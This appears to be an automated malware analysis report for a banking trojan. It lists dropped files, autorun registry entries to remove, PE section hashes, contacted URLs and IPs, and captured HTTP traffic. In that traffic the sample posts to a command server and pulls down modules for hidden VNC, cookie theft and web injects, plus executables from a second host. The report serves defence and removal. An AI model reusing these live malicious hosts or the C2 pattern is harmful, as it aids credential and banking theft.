%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
%WinDir%\inf\SET38.tmp (12 bytes)
%System%\SET2F.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
%System%\SET30.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)
%WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe " - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 254048 | 254464 | 5.09777 | a77de89eaf55b3a6eb3c86e9e2fcfdcd |
.data | 262144 | 12752 | 3072 | 2.67156 | 585d91141ce4dcbc0176d6d4a54475b4 |
.reloc | 278528 | 9306 | 9728 | 4.20519 | ecd715ec6d1021452fd0957d69ffac60 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.cpro.moscow/kent/file.php | 195.242.161.117 |
hxxp://www.google.com/webhp | 173.194.113.209 |
hxxp://www.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP | 173.194.113.209 |
hxxp://www.cpro.moscow/kent/exit.php | 195.242.161.117 |
hxxp://changeexchange4.ru/new.exe | 194.28.133.91 |
hxxp://changeexchange4.ru/bindata865.exe | 194.28.133.91 |
hxxp://microsoft.com/ | 134.170.188.221 |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 23.64.226.15 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bindata865.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: changeexchange4.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 20 Sep 2015 13:52:44 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 20 Sep 2015 12:45:22 GMT
ETag: "1c795a1-6242c-5202d2355dc80"
Accept-Ranges: bytes
Content-Length: 402476
Connection: close
Content-Type: application/x-msdos-program
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................O.......{.......R.......B...............z.......K.......L.....Rich............PE..L......U..........v..................N............@..........................`.......Y.... .......................................... .......................@......................................h...@............... ............................text...A........................... ..`.rdata...!......."..................@..@.data...............................@....4data..f-..........................@....rsrc........ ......................@..@.reloc.......@......................@..B.........................................................................................................................................................................................................................................................................................................................C.1..:H\\......<.o.8..l..P..H..t6D.o.o..`= ^p|..Q_........6..L.N).....x@=.............<.)T.!P.o....o.o..n........T:..:../U:i|.:......).o.o..).........L:.....=..........T\...........T......S.M.....].....(^.....w.T..]....X\.......x.!T\S..\\\..T........._.`........._.$........._.|........._.x........._.@......\\\\.U.....].........g.D/.........._P.......................g.P)}......S.X............._X........X..o.....T\....................L..P......\\\\...\\\\...\\\\.U.....]......g..!...T_..S.T..LS...S...o.
<<< skipped >>>
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Sun, 20 Sep 2015 13:52:51 GMT
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>
GET /webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cache-Control: no-cache
Host: VVV.google.com.ua
HTTP/1.1 302 Found
Location: hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: gws
Content-Length: 281
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: PREF=ID=1111111111111111:FF=0:TM=1442757163:LM=1442757163:V=1:S=wshWM2whNkU12bKk; expires=Thu, 31-Dec-2015 16:02:17 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=71=XMvwuHf2AYJf-H3X3-9LfytjOF82Yzw25AX3pFcNMCLiNicEeMbCMUhD08OlXnPMnRnB1gMsrYgzsDMrDnawfCkk256_UD-JSIIkHgUhE5AvWpL0AXPpZ_O_3349_pir; expires=Mon, 21-Mar-2016 13:52:43 GMT; path=/; domain=.google.com.ua; HttpOnly
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP&gws_rd=ssl">here</A>...</BODY></HTML>....
POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 132
Connection: Keep-Alive
Cache-Control: no-cache
....$..0..<l..t-..st....sQs.p..YN..(m=..l.%..T.)..f....r.Xe3.9*<...=.X..z..."Yc1...V,...2g.t\H0Z..9.. .x.eV.%.1.|TO....q..........
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 14144
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/kent.xml"
Content-Transfer-Encoding: binary
1....Z.ec...4.....|}..W.X.~."........*..?n.#M..EW.S.n..Xf..p5[.%.O..x5...q...]...q.!\.l.z...E..i...}...P...e..u..h.dg,b..=..A..I...U.RC.S..B....9.B;...]b......-..4z^.l.............0.=...........YY..... Y4z$......t...o...C}*.j....9...6.N.......?...M.?'X..b.........K..!..$2x...K..^..._......s.w...U.=.K..\..Su1..=.bB^.N.J.....l...?...S......F.E..%..E... S_x.]...g.,T.B..V5;..)=.b.0@!....v3sBL)....d....%F]..2.H}.......U^.Bt...)..m...p0.M..%..K.9.N....N.u..<.. {.rl .....O....iq...Y.#;^6....`.~,z.Y..HZ...3...Y...~('.9...d.u"...........TJ.*.<.N.xQ/TH(.......>p,..M/_..O....f.........K.C..'....q.[2aHm/s.J.DS....7z......._.....,.(..!JG.#..cB.....0.....=.g....t...%a..."6..!bxj/.<.!..........E..$]......_J..3Vu.tm...........J-.w..u.h..3...T....rlU..f.a@r^0....6!..Q_ .o...G..e._qXE........{...F.....d..qv....X.[@}..|..-.:JKO..h........;...$.....................R.f....O..n.....Oz.@?..7.Ee.#~G.......5;...f.9.z:..w...#I....;.a.........Vs..s.i^. r..#.&...!.A....K%......z.F....>]....a/4.../..L.VC?...4l ..!..... .UI....a.."f....g..k.=qj.n\....t.?p=..=}m..k.P.........P...R..tJE.gk..O.......Am..T..1.o....E..)w..9fu.?...zGn........w.U~S.>3I.......i4.H.D..-KD~f.,H.K....n...9..w...4.g-.....L)s.ueYU....b..f.\. ..b..IK.Sxi:.."..j.X..W.^&*.....s..Rb-.j.v7.vM.....N.eM]..;.va..K.].{Z.M....T..RO......L.*-.....k~;.P...Z.1k=.fx..P%.kf..w#...=.. ....D..o....$..?x>yy.:..:@..2.#Jq.I(.T8.%..Y...@.....@...........5b..B.;}.3/..i...X.'....G].ET..2k....u..3.M.d)...n9..Z.....(O..d98.2...u...].z.mw.....\F..:. ....L.q.....-......k?.B..
<<< skipped >>>
POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache
1......wf....a.se.......De.7...0......e...w..Q.F.....H..N..)....o.......g... .R...)..R......:....#Gb|. .....lQK.d./.TQ.\rzx...,K.(.....@..1...p>
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 221468
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_ffcookie.module"
Content-Transfer-Encoding: binary
.....Qp.d8... ^c.PK..Q^/-...vii..'E.......a.K..........a[.......F5...}.%.......j..b...Rq......k.....DC.Y.l.|..6_...1....U..}...WjB|..3%.....hh....}R.r;1..CV%Q.gM....._.......}xo...(.......$.=Y....z....X...2....O..>.Ijg.....o...Mx80.&.C.Ti....CL....0..x....I7wN5...ei.$.... *..)......m.Y...."....PRPk..........8............s.)...a...Ul.B............l......X.~..L..A...x`)..z(....2)..Rqvx.S..{K."........k..L.....9...[..Y...&..D..m.J..fNN..Y..c..u.a...W43XphI.'<v....*.f.E.OYZ..F:.X....n..B....-..Bu..pw.{#........[5....u..5..X7. .0....|...g.q...I.!...j...........U....E.^bXr....I.~G"7].(...M.)".BHC.,6!..2.b...K..&.b.#q.s...\8]...'..lC..w....E.....4.c....c}.@$.w..B...9...o...J....DP.`j.t..n......)...T\.a.@..^.=...C..X.U....{......(.[...$S....PL.h...6.(....{.t..Y...1.r......T.....k.....1..l..C.C..b"Q.Z...A.K`.]:C.....N....o)....7.y...E..8..W...x...j........d..Y.../.sid.g..H.Y.`.....hC.W.......v...v..j...&......S.c...X...ky...nE\.QZ....&.8x.nT.*...u.....<.....U.!.........4...us..?......1........W..*YC.......RS3.p..q^.....$.S.=....c..U..E......-....O..v.w.Y.......*.....G...Tq...6......Z....B.[........ ,..a..A..a.....R.B....m'.h..[...o.R..GDf.L.N@...J..Y....\^.o.". .e...x.......E.........<i6Y>........k.t...R&..#}.].g........1....:...(.;.........."......EQ5.........R". ..~.4F......r...x..".`y(...l..a{'.E..._#._...u=.|."d m>..0&........%..x.tv....x./g.Ty.=..).*Bu7t0..-....<..l.O.m?.].'....5.8....;....%.4y.M..p.Q^&.....n..@..|V.(._e...M..0...sl.|y......&.3b]Z.O..a.........G.. F.2.......;%R..L7.{.(s...<_
<<< skipped >>>
POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 404
Connection: Keep-Alive
Cache-Control: no-cache
I>.d....G.J.]...<.!.X..B..Cp1?....(.R..*....d..=....9h....E...-c3......8....4...|O.....p.:.Sp5..m..&..y..E3..q.$...\.B.`7.|w......n........T...t.U...L..Cb.Qq
_.).....h.%s.b..0.,?jEQ......|Va......<.du.C...3...N...0]A..S....Q{~..vw.@...K.yY`nI....8.".{:0.l..5A.]...8..#. p."lDn.....qg:.q*...W.`C@..P?.R..$.V$....g......c.M.C..._..c<.... ...&.]..r.2..Z....T.]A.n....k*...?. .....u7..8.'..<...=vvb.%1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 305
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
.2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5...q...C..2............no`...............K..3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s....HTTP/1.1 200 OK..Server: nginx/1.2.1..Date: Sun, 20 Sep 2015 13:52:44 GMT..Content-Type: text/html..Content-Length: 305..Connection: keep-alive..X-Powered-By: PHP/5.4.27-1~dotdeb.1..Vary: Accept-Encoding...2._.7......b...3.{.J.k...........s.{(A3.a^...N._..[f...I....l.<%.5...q...C..2............no`...............K..3...3......_..M..H.,1gI.v....o..bOP........o....[......zy.s....] ..G2.....-.........;C..oc....hh.M....~O 2...`......&...SpH.....*..4. ....[....Ez.......-i.(....}.u{....<./17.JS.:H.h!v......s........
POST /kent/exit.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 277
Connection: Keep-Alive
Cache-Control: no-cache
.PLr...`..\...E_%.hO..pC{ny.....
89. C7%d/..;.".7.......e.1...._.i`..O.f.. DR..5B.....2]...,9.8...q....W._....zq
w..7.C...sN\D....7.3..Ajoq.h.S/.2....a1........TF..m./s.n.e_
G.M..M.?!.../.j..i".>.bR..8%C..l=.j8.Hw.M...5Gkbo.&....Fp...@...u.E..;k....7l...6..0...'-..;.....
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:44 GMT
Content-Type: text/html
Content-Length: 76
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Vary: Accept-Encoding
....]..Q.....X.V..MBc.i.%...).... ._73,..&.|..G5.1].h>5.)...K.5......A.6.E.....
POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 147
Connection: Keep-Alive
Cache-Control: no-cache
._..1.G.S.....Zw%A.X~"...<.J;....=.. >(..;>{_f.2...Jb:..h.?...bV.)vT(..W|..D..E._.R.....#..C.h........q....w..X{..PX'.,&....[r.zk.qi.......aE...|.
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:45 GMT
Content-Type: application/octet-stream
Content-Length: 9887
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/webinjects/merged-1.txt"
Content-Transfer-Encoding: binary
.[}.h3....H*{.1..;.E...b...K!Hi....4t"..Jx.l4...k..}.@.v ...w.kM.ts.R....|i..uH.r!c........Pk...6.w.P:...zWpt....Y.-...)...i....y"..vyn.J.z.......vR...........yB.....d\....nh..[.e.}.?Y.g\8Fd[J.#..s.~....H.~H...~g..er.,....&1...Ggg..!..1fw .y?j.|.E2i_.^.l...Gn.........wD._B;..h01Y..v..U:..2.4..U.....?.>.Pn...Vy.g..."g.l.60.h8i.`.......5..B.XwS.U.....X<:...<.(.l..&d:.to.........b.....U...<....d.xf....K.sq[F....1\]..=Z&..|..~......E........MPt.#D....,3.*..:5...d.]..Z.........YjR.....*\.M.,..#/j.....f=....L7...,C..z..{...s1.X...Q~'.:>..ln..&.....a...).j..G...............RLk.&..bs.mN...6{.e..r..I~`,..G...*W.. ..7.k.v....Wr..P....(^.K........-..Lw.....{br...U!5. L'....?.....p..../.}3...\;..&h6'2..<..E..ZN...o.|.,.....6eb......|1...!.$....<.,.q.C....-..q..X..T.6....G(.."...Hc..d.........r.;U..7q..,.6c...e$p.[.J..l....x..7.D..% ..(..]..rJ-g..V}_.B..m...5q.. ..Q....NX%..v..n._A...G....(). ~.}:}...*..#..&U........gQbh).d.R".u.G.z)\.."..!H.\.......8. |.....#.yR.|..Qp....v.k\.BeE...U3..=.g..lR.DL.....3o..i.\?6[..0..f..E.0.i.Bw.u..El..Q@c......D..=..#..1...).XN.2._>>5.....B..?/.,.aF.....'.S...N{....;..Z...1.....%.v.?{...@J.z|..O.i.(.....Lk.-t.7...A........>r...v....19.-VT./....U|M..Niu.`...?r\.o..j;`..[.n.k@..|..i.~...j$....5#(..7..._.U..nl......OH....'.`V.DN5<QyE=....'5e....x......|4..P...G...N.GI...e....,...K^/........u,k..sD=.....L.NR.>.....]Q...&.]0....k.W.:.k'.Q.i....6,-Qp~!{qkr.:..."....-.........tD...zD!.c....vHM.?.*..^..J....X.5.<.u........c7...7jo.dm.(BB..0......I...h.....q&q
<<< skipped >>>
GET /webhp HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP
Content-Length: 265
Date: Sun, 20 Sep 2015 13:52:43 GMT
Server: GFE/2.0
Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXp://VVV.google.com.ua/webhp?gfe_rd=cr&ei=K7r-VaH8KMSAYPvqs9AP">here</A>...</BODY></HTML>....
POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache
.....HQ..K4.fR......2.44S..kq..@I3.;..u.k.>...c...*.....s..Y#Z.....i&|GC)T>*E.&..ic..'b..d.&...Av...&....g ..MO.zm.[.K..}
..2a.? 4c.T..^.TO
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 174876
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_video.module"
Content-Transfer-Encoding: binary
.....Qp.d8........'(.e..........4".,.NA...7.H.j...C....4.zR..T8..X...V.*.....<...0.$.S0...uq.z.kv..>.7.YF(..U.3su.DE,\A....{Q{}.[.]..Q.C..aW..,r%'N..*....M.Y.....^4..*~...NO..,"d./..s<GRR.Pb..1F....\t.CX..f.~mjL.:%,....[....wTS2b....lx...@.....C..;2........]........<.Z..3....\.5e..N...p....!;.d/...gy....=..Q.%3./.b... .<.d.R.{'.".#.LC-...]....&w.R.unO.).M=.i$.w....&....j%2?.. .c|;6h.eK.k.....G...J...*. .U.2.r&6-j....TN...2...XI...M.......uC.T.Y... ......$...E..@.G.3J..S...b)>".%u..-.....e...o.d.mV..(......D..F.p&..{.i.G&..Z....?EV.V:.SB.W.g...|u.....Y.U..G.>j..g....ClX..........u.....W.......z.f....]K.4.6#.B...Q&.PQ5......:..... ......Z.6..}.e.o...~.R.._i:...4.. =[}.@o...W...!..[.$@....,Y...v...UP...... ...[IZ.(B...3. ..VotAq#....."P...U.-.#...K.^,x4R-.`q.<,bE....?..g..g.;...KHs.?..... j`.I.q.=V.|...MI...........^.4V.N.f......IOt..4`.."*T8@.d.`. ...iS......G..,....1.X.i.......p.c....0.,..z.....j.......t..Q.T.8...A........).).#...i..$9...."OV.Qn.......^.M..V...~B....:...9C.l5 ..Y.|........l.t.&...:u..z..I....'...)...l...l;.3 ....`.R.tf."(y@...Rg..B.../...C.d.y%...>..\...J.ca.....{......1_..8P$....ob....w.4....`gi..*)E...I...E...n.`.6.....^-.....d.:I.\..\3....#kx1... 2..T...(KY=v.......y...P2.JFs..H...u1..F.U..o.3.&.#.D.t$...AP. ....F.PC...#......T./...e.7. ......a.p.g.C\=.i7}5..5...,.Ew..b..$.D....m.-[....G.3.U........ e!Y?....2*..wc.af....xmH...O.T`......k...7..2.%bI..K.....E~..F=....3.....M.xY........<....($..Q..C..RH.G(t.e...t/Wf,. ..G.o.I.*..HB.F.(..t.[.t.1=..O..../..Lj^.[.,].].
<<< skipped >>>
POST /kent/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.cpro.moscow
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache
fOg..3<.Z...=.Wv....b.:.$..4..0Y.....k.. .[...|..j...l..=-.;N......*.x...?3D...J3?......V...b..I......#fF.&*v..............V./....8.`./..%
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 20 Sep 2015 13:52:14 GMT
Content-Type: application/octet-stream
Content-Length: 225052
Connection: keep-alive
X-Powered-By: PHP/5.4.27-1~dotdeb.1
Cache-Control: public
Content-Disposition: attachment; filename="./files/atmos_hvnc.module"
Content-Transfer-Encoding: binary
.....Qp.d8........f.U....y...c.l.C.e..|k..1.@.._.CF._:.l.;0U^."}..J..f...3K._I.........f. h....^0..(..7..k.J<.Q .R..\`.t. .c.../.a6..%.D..}b.V{<%.7qX,......A.......!.F>_.O..P...#.DS7.............Z,......!...\.cS......[|......p.K.Y...P.V..x.Y..^"P.I?.7oj>...h.x.........Q ./.......;,NF%Wf.YOQ.*z.l"...........w.....>.d...........rY,.c.(H..^h... .....}.%Z.....H<...g.:t{2l.Y.r6.....x.....q,kW...thS.....1....S .5.Cb.b.O.?....s....*d\..#...2u..cDFY$......Bp....*......p#.u....6....WU.;F..l.......c>z....D.H.WJ-.2U........>.......D...........x9..R......'.5..,..;..... .M........"O.........B....-^#;.A.._*lb.6IP.'.k.o.......9<.>g......P..T.p.t..,%.......a..#.~.r84.._.....U..LI.....!.....5..D.....`...A..g.4.0~6.....!...M.I.O....4..]65v......]...@.m...5........... ...R..7>.....4.C..a.qw)B......./.P.....x....x)w.x..e........r....4j......`Ms...E.....#..x0..$.ix...N..70Ug...G0.{-.ZF.R.-....?.......8p.......j.|q.9.{.~..@.9c]...X.Y/.^.....&$Az\....e....i.P.%....../.B./.QE.2V0..A.h!....,...L-. ......O@...c..........u.e.~...N-..h.:#....A.Bh.L..-W..7....r?%.ZHq.G..q.O.t6."G.M?.1.h......Ap?.1T ...B.H...e........A.q.3.W.......`....W..?..6.;.....p.U....$.....G....x.........4.......=a.-. 